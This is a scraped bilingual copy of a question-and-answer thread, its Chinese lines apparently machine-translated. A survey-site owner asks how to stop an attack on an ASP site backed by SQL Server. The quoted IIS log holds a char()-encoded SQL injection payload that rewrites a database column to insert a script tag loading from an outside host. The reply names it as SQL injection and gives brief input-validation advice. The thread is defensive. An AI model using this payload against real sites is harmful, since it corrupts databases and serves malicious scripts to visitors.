问题描述
我们有一个调查网站,显然攻击。这些症状是相同的什么在这个网站上看到以下页描述:
http://stackoverflow.com/questions/3775964/xss-attack-on-the-asp-net-website.
We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site:http://stackoverflow.com/questions/3775964/xss-attack-on-the-asp-net-website.
我发现多个条目在我们的IIS日志,其中包括恶意code:
I found multiple entries in our IIS logs that included the malicious code:
< / TITLE>< SCRIPT SRC =的http:// google-stats49.info/ur.php>。
下面是CS-URI的查询字段的IIS日志条目之一的值的一个例子。
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
我不明白上面的code ++工程,但显然这是在查询字符串被发送到腐败列在我们的数据库中的表。我们已经关闭了我们暂且网站。我们可以从数据库中删除脚本,但是,这并不prevent它被再次损坏,当我们把网站重新上线。
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
有没有人对如何prevent这种情况的发生有什么建议?
Does anyone have any suggestions on how to prevent this from happening?
推荐答案
这是一个SQL注入。
That's a SQL injection.
- 从不信任用户输入。你把输入和直接传送它的数据库
- 永远不要相信你的用户的输入!
- 检查所有输入对允许值的白名单。
- 对于文本输入确保一切都逃脱
有关于这个问题吨:<一href=\"http://www.google.com/search?q=$p$pventing+SQL+injection&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla%3aen-US%3aofficial&client=firefox-a\">Google是你的朋友
这篇关于在ASP网站的攻击,它使用一个SQL Server数据库的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!